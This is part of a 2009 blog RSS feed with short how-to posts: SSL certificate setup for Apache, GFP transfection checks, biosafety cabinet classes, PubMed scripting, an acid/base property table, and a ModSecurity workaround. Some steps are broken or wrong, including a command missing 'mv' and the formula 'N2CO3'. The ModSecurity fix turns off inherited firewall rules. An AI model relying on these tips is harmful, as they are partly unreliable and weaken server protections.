2,  Upload csr file to GOoDaddy website to generate certificate files. Download the zip file to your server and unzip it.
3, use this command to remove password so apache will start automatically without [...]]]></description>
			<content:encoded><![CDATA[<p>1, Login to your server and issue these commands:<br />
<blockquote> openssl genrsa -des3 -out innovita.key 2048<br /> openssl req -new -key innovita.key -out innovita.csr</p></blockquote>
<p>2,  Upload csr file to GOoDaddy website to generate certificate files. Download the zip file to your server and unzip it.</p>
<p>3, use this command to remove password so apache will start automatically without asking for password.</p>
<blockquote><p>  openssl rsa -in innovita.key -out innovita.key.insecure<br />  innovita.key innovita.key_w_password<br />  cp innovita.key.insecure innovita.key</p></blockquote>
<p>4, Configure ssl.conf file, add these lines:</p>
<blockquote><p>  SSLCertificateFile  /home/innovita/ssl/innovitainc.com.crt<br />  SSLCertificateKeyFile  /home/innovita/ssl/innovita.key<br />  SSLCertificateChainFile  /home/innovita/ssl/gd_bundle.crt </p></blockquote>
<p>5, Restart Apache<br />
<blockquote>  Apachectl restart</p></blockquote>
<div class="zemanta-pixie"><img class="zemanta-pixie-img" alt="" src="http://img.zemanta.com/pixy.gif?x-id=50457604-d50c-8c53-a0e5-05c9287a15c7" /></div>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/how-to-generate-self-signed-ssl-certificate-from-godaddy-for-your-web-server/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Monitor DNA Transfection Efficiency using GFP and Blue Light Transilluminator DarkReader</title>
		<link>http://www.my-whiteboard.com/monitor-dna-transfection-efficiency-using-gfp-and-blue-light-transilluminator-darkreader/</link>
		<comments>http://www.my-whiteboard.com/monitor-dna-transfection-efficiency-using-gfp-and-blue-light-transilluminator-darkreader/#comments</comments>
		<pubDate>Sun, 01 Nov 2009 03:06:40 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Biotechnology (Public)]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/?p=435</guid>
		<description><![CDATA[1, Transfect your cells with a vector containing GFP.
2, Put your plate or dish on top of&#160; a DarkReader.
3, Take a picture of cells using  a simple gel-documentation system  from labsupplymall.com&#8212;you do not need an expensive fluorescence microscope to check transfection efficiency.
Example: Transfect Hela cells using GeneExpresso and PolyExpress in vitro DNA transfection [...]]]></description>
			<content:encoded><![CDATA[<p>1, Transfect your cells with a vector containing GFP.<br />
2, Put your plate or dish on top of&nbsp; a DarkReader.<br />
3, Take a picture of cells using <a href="http://www.labsupplymall.com/nucleic-acid-stains-84/gel-documentation-system-for-safe-nucleic-acid-stains-grgreen-gelstar-gelgreen-sybr-gold-and-sybr-safe-69667.html"> a simple gel-documentation system </a> from labsupplymall.com&#8212;you do not need an expensive fluorescence microscope to check transfection efficiency.</p>
<p>Example: Transfect Hela cells using GeneExpresso and PolyExpress in vitro DNA transfection reagent:  </p>
<p><img src="http://www.labsupplymall.com/temp/whiteboard/IMG_3031.jpg"/><br />
<strong><br />
Of course you will see more clearly under  fluorescence microscope:</strong></p>
<p><img src="http://www.labsupplymall.com/temp/whiteboard/GE_with_Serum.jpg"/><br />
Transfection in the presence of serum and antibiotics</p>
<p><img src="http://www.labsupplymall.com/temp/whiteboard/GE_without_serum.jpg"/><br />
Transfection in the absence of serum and antibiotics</p>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/monitor-dna-transfection-efficiency-using-gfp-and-blue-light-transilluminator-darkreader/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Biological safety cabinet vs laminar flow hood</title>
		<link>http://www.my-whiteboard.com/biological-safety-cabinet-vs-laminar-flow-hood/</link>
		<comments>http://www.my-whiteboard.com/biological-safety-cabinet-vs-laminar-flow-hood/#comments</comments>
		<pubDate>Fri, 31 Jul 2009 03:56:25 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Biotechnology (Public)]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/?p=431</guid>
		<description><![CDATA[Laminar Flow Hoods
    *  provide product protection only and must not be used when working with any form of biohazard or chemical hazard
    *  any potentially infectious aerosol that is created will lead to exposure of the operator and the environment
    * horizontal-flow clean-air [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Laminar Flow Hoods</strong></p>
<p>    *  provide product protection only and must not be used when working with any form of biohazard or chemical hazard<br />
    *  any potentially infectious aerosol that is created will lead to exposure of the operator and the environment<br />
    * horizontal-flow clean-air bench used for cell cultures can expose the researcher to aerosols of allergenic or infectious materials.<br />
    *  vertical-flow clean-air bench also blows air out into the room</p>
<p><strong>Biological Safety Cabinets</strong></p>
<p>    * provide personnel and environmental protection and commonly product protection<br />
    * infectious agents must be used in a biological safety cabinet NOT a laminar flow hood</p>
<p><strong>Class I Biological Safety Cabinet</strong></p>
<p>    * a ventilated cabinet which provides personnel and environmental protection only<br />
    * air flow is directed away from the researcher, but is not HEPA filtered, therefore there is no product protection<br />
    * similar to a fume hood with a HEPA filter on the exhaust system to protect against the release of biohazards<br />
    * inward air flow ranges from 75-125 linear feet per minute (lfpm)<br />
    * can be used with radioisotopes and some toxic chemicals</p>
<p><strong>Class II Biological Safety Cabinet</strong></p>
<p>    * provides personnel, product and environmental protection<br />
    * there are supply air and exhaust air HEPA filters<br />
    * two general types: IIA cabinets have a minimum inward air flow of 75 lfpm and recirculates 70% of the air; IIB cabinets have a minimum inward air flow of 100 lfpm and exhaust either 70% (type B1) or 100% (type B2)<br />
    * most of the biological safety cabinets at UVic are Class II<br />
<strong><br />
Class III Biological Safety Cabinet</strong></p>
<p>    * these cabinets provide personnel, product and environmental protection<br />
    * they are hermetically sealed and all procedures are conducted through arm-length rubber gloves<br />
    * used in high level (Level 4) containment labs<br />
    * there are two HEPA filters on the exhaust system </p>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/biological-safety-cabinet-vs-laminar-flow-hood/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Automated search of NCBI Pubmed databases</title>
		<link>http://www.my-whiteboard.com/automated-search-of-ncbi-pubmed-databases/</link>
		<comments>http://www.my-whiteboard.com/automated-search-of-ncbi-pubmed-databases/#comments</comments>
		<pubDate>Mon, 27 Jul 2009 02:24:14 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Biotechnology (Public)]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/?p=430</guid>
		<description><![CDATA[Here is how I search NCBI PubMed using script.
1, Write a script in Perl or Java to search pubmed by date and keyword.
2, If there is &#8220;next&#8221; link on the result page, let script to click on &#8220;next&#8221; link until there is no more &#8220;next&#8221; link.
3, extract abstract link from search result pages
4, pause 15~ [...]]]></description>
			<content:encoded><![CDATA[<p>Here is how I search NCBI PubMed using script.</p>
<p>1, Write a script in Perl or Java to search pubmed by date and keyword.</p>
<p>2, If there is &#8220;next&#8221; link on the result page, let script to click on &#8220;next&#8221; link until there is no more &#8220;next&#8221; link.</p>
<p>3, extract abstract link from search result pages</p>
<p>4, pause 15~ 25&nbsp; seconds between each click.</p>
<p>5, click each abstract page, make sure efetch is used, e.g., </p>
<p><a href="http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&amp;id=19501051&amp;retmode=xml">http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&amp;id=19501051&amp;retmode=xml</a></p>
<p><a href="http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pmc&amp;id=2708341">http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pmc&amp;id=2708341</a></p>
<p>6, parse abstract using an XML parser.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/automated-search-of-ncbi-pubmed-databases/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Properties of Common Commercial Acids and Bases</title>
		<link>http://www.my-whiteboard.com/properties-of-common-commercial-acids-and-bases/</link>
		<comments>http://www.my-whiteboard.com/properties-of-common-commercial-acids-and-bases/#comments</comments>
		<pubDate>Sun, 19 Jul 2009 11:17:17 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Biology]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/biology/properties-of-common-commercial-acids-and-bases.html</guid>
		<description><![CDATA[Properties of CommonCommercial Acids and Bases 



 
NAME,Formula      
      
Molar 
Mass
      
Mol/L 
(Molarity)
      
(Grams solute)/L
% byMass
Density(g/mL)


acetic acid, glacial,      HC2H3O2
60.05
17.4
1045
99.5
1.05


acetic acid, diluteHC2H3O2
60.05
6.27
376
36
1.045


butyric acid,HC4H7O2
88.1
10.3
912
95
0.96


formic acid,HCO2H
46.02
23.4
1080
90
1.20


hydroiodic acid,HI
127.9
7.57
969
57
1.70


hydrobromic acid,HBr      [...]]]></description>
			<content:encoded><![CDATA[<p><font size="+2"><strong>Properties of Common<br />Commercial Acids and Bases<br /></strong></font> <br />
<table width="657" border="1" cellpadding="5" height="1185">
<tbody>
<tr>
<td valign="top" width="40%"> 
<p align="center"><strong>NAME</strong>,<br />Formula      </p>
<p>      </td>
<td valign="top" width="12%">Molar<br /> 
<p>Mass</p>
<p>      </td>
<td valign="top" width="15%">Mol/L<br /> 
<p style="width: 87px;">(Molarity)</p>
<p>      </td>
<td valign="top" width="10%">(Grams solute)/L</td>
<td valign="top" width="10%">% by<br />Mass</td>
<td valign="top" width="12%">Density<br />(g/mL)</td>
</tr>
<tr>
<td valign="top"><strong>acetic acid, glacial,<br />      </strong>HC<sub>2</sub>H<sub>3</sub>O<sub>2</sub></td>
<td valign="top">60.05</td>
<td valign="top">17.4</td>
<td valign="top">1045</td>
<td valign="top">99.5</td>
<td valign="top">1.05</td>
</tr>
<tr>
<td valign="top"><strong>acetic acid, dilute</strong><br />HC<sub>2</sub>H<sub>3</sub>O<sub>2</sub></td>
<td valign="top">60.05</td>
<td valign="top">6.27</td>
<td valign="top">376</td>
<td valign="top">36</td>
<td valign="top">1.045</td>
</tr>
<tr>
<td valign="top"><strong>butyric acid</strong>,<br />HC<sub>4</sub>H<sub>7</sub>O<sub>2</sub></td>
<td valign="top">88.1</td>
<td valign="top">10.3</td>
<td valign="top">912</td>
<td valign="top">95</td>
<td valign="top">0.96</td>
</tr>
<tr>
<td valign="top"><strong>formic acid</strong>,HCO<sub>2</sub>H</td>
<td valign="top">46.02</td>
<td valign="top">23.4</td>
<td valign="top">1080</td>
<td valign="top">90</td>
<td valign="top">1.20</td>
</tr>
<tr>
<td valign="top"><strong>hydroiodic acid</strong>,<br />HI</td>
<td valign="top">127.9</td>
<td valign="top">7.57</td>
<td valign="top">969</td>
<td valign="top">57</td>
<td valign="top">1.70</td>
</tr>
<tr>
<td valign="top"><strong>hydrobromic acid</strong>,<br />HBr      </td>
<td valign="top">80.92</td>
<td valign="top">8.89</td>
<td valign="top">720</td>
<td valign="top">48</td>
<td valign="top">1.50</td>
</tr>
<tr>
<td valign="top"><strong>hydrochloric</strong>,<br />HCl</td>
<td valign="top">36.5</td>
<td valign="top">11.6</td>
<td valign="top">424</td>
<td valign="top">36</td>
<td valign="top">1.18</td>
</tr>
<tr>
<td valign="top"><strong>hydrocyanic acid</strong>.<br />HCN</td>
<td valign="top">27.03</td>
<td valign="top">25</td>
<td valign="top">676</td>
<td valign="top">36</td>
<td valign="top">0.697</td>
</tr>
<tr>
<td valign="top"><strong>hydrofluoric acid</strong>,<br />HF</td>
<td valign="top">20.01</td>
<td valign="top">32.1</td>
<td valign="top">642</td>
<td valign="top">97</td>
<td valign="top">1.167</td>
</tr>
<tr>
<td valign="top"><strong>hypophosphorous acid</strong>,<br />H<sub>3</sub>PO<sub>2</sub></td>
<td valign="top">66.0</td>
<td valign="top">9.47</td>
<td valign="top">625</td>
<td valign="top">55</td>
<td valign="top">1.25</td>
</tr>
<tr>
<td valign="top"><strong>lactic acid</strong>,<br />HC<sub>3</sub>H<sub>5</sub>O<sub>3</sub></td>
<td valign="top">90.1</td>
<td valign="top">11.3</td>
<td valign="top">1020</td>
<td valign="top">50</td>
<td valign="top">1.2</td>
</tr>
<tr>
<td valign="top"><strong>nitric acid</strong>,<br />HNO<sub>3</sub></td>
<td valign="top">63.02</td>
<td valign="top">16.0</td>
<td valign="top">1008</td>
<td valign="top">71</td>
<td valign="top">1.42</td>
</tr>
<tr>
<td valign="top"><strong>perchloric acid</strong>,<br />HClO<sub>4</sub></td>
<td valign="top">100.5</td>
<td valign="top">11.65</td>
<td valign="top">1172</td>
<td valign="top">70</td>
<td valign="top">1.67</td>
</tr>
<tr>
<td valign="top"><strong>phosphoric acid</strong>,<br />H<sub>3</sub>PO<sub>4</sub></td>
<td valign="top">98</td>
<td valign="top">14.7</td>
<td valign="top">1445</td>
<td valign="top">85</td>
<td valign="top">1.70</td>
</tr>
<tr>
<td valign="top"><strong>sulfuric acid</strong>,<br />H<sub>2</sub>SO<sub>4</sub></td>
<td valign="top">98.1</td>
<td valign="top">18.0</td>
<td valign="top">1766</td>
<td valign="top">96</td>
<td valign="top">1.84</td>
</tr>
<tr>
<td valign="top"><strong>sulfurous acid</strong>,<br />H<sub>2</sub>SO<sub>3</sub></td>
<td valign="top">82.1</td>
<td valign="top">0.74</td>
<td valign="top">61.2</td>
<td valign="top">6</td>
<td valign="top">1.02</td>
</tr>
<tr>
<td valign="top"><strong>ammonia, aqueous</strong>,<br />NH<sub>3</sub></td>
<td valign="top">17.0</td>
<td valign="top">14.8</td>
<td valign="top">252</td>
<td valign="top">28</td>
<td valign="top">0.898</td>
</tr>
<tr>
<td valign="top"><strong>potassium hydroxide</strong>,<br />KOH</td>
<td valign="top">56.1</td>
<td valign="top">13.5</td>
<td valign="top">757</td>
<td valign="top">50</td>
<td valign="top">1.52</td>
</tr>
<tr>
<td valign="top"><strong>sodium carbonate</strong>,<br />N<sub>2</sub>CO<sub>3</sub></td>
<td valign="top">106.0</td>
<td valign="top">1.04</td>
<td valign="top">110</td>
<td valign="top">10</td>
<td valign="top">1.10</td>
</tr>
<tr>
<td valign="top"><strong>sodium hydroxide</strong>,<br />NaOH</td>
<td valign="top">40.0</td>
<td valign="top">19.1</td>
<td valign="top">763</td>
<td valign="top">50</td>
<td valign="top">1.53</td>
</tr>
</tbody>
</table>
<p></p>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/properties-of-common-commercial-acids-and-bases/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fix WordPress Error “Method Not Implemented  POST to /wp-admin/post.php not supported.”</title>
		<link>http://www.my-whiteboard.com/fix-wordpress-error-method-not-implemented-post-to-wp-adminpost-php-not-supported/</link>
		<comments>http://www.my-whiteboard.com/fix-wordpress-error-method-not-implemented-post-to-wp-adminpost-php-not-supported/#comments</comments>
		<pubDate>Sat, 13 Jun 2009 13:27:15 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/?p=428</guid>
		<description><![CDATA[If you have Apache ModSecurity installed and try to edit your blog, you mayget this error:
&#8220;Method Not Implemented&#160; POST to /wp-admin/post.php not
supported.&#8221;
Your apache error log, e.g., /var/log/httpd/white_board_ssl_error_log,
may have a line like this:
ModSecurity: Access denied with code 404 (phase 4).
To fix it, open your http virtual host file add this line:
SecRuleInheritance Off


e.g.,
&#60;Directory
&#8220;/home/xxx/webapps&#8221;&#62;
&#8230;
SecRuleInheritance Off
&#8230;
&#60;/Directory&#62;

]]></description>
			<content:encoded><![CDATA[<p>If you have Apache ModSecurity installed and try to edit your blog, you mayget this error:<br />
&#8220;Method Not Implemented&nbsp; POST to /wp-admin/post.php not<br />
supported.&#8221;</p>
<p>Your apache error log, e.g., /var/log/httpd/white_board_ssl_error_log,<br />
may have a line like this:<br />
ModSecurity: Access denied with code 404 (phase 4).</p>
<p>To fix it, open your http virtual host file add this line:</p>
<div style="margin-left: 40px;">SecRuleInheritance Off
</div>
<p>
e.g.,</p>
<div style="margin-left: 40px;">&lt;Directory<br />
&#8220;/home/xxx/webapps&#8221;&gt;<br />
&#8230;<br />
SecRuleInheritance Off<br />
&#8230;<br />
&lt;/Directory&gt;
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/fix-wordpress-error-method-not-implemented-post-to-wp-adminpost-php-not-supported/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
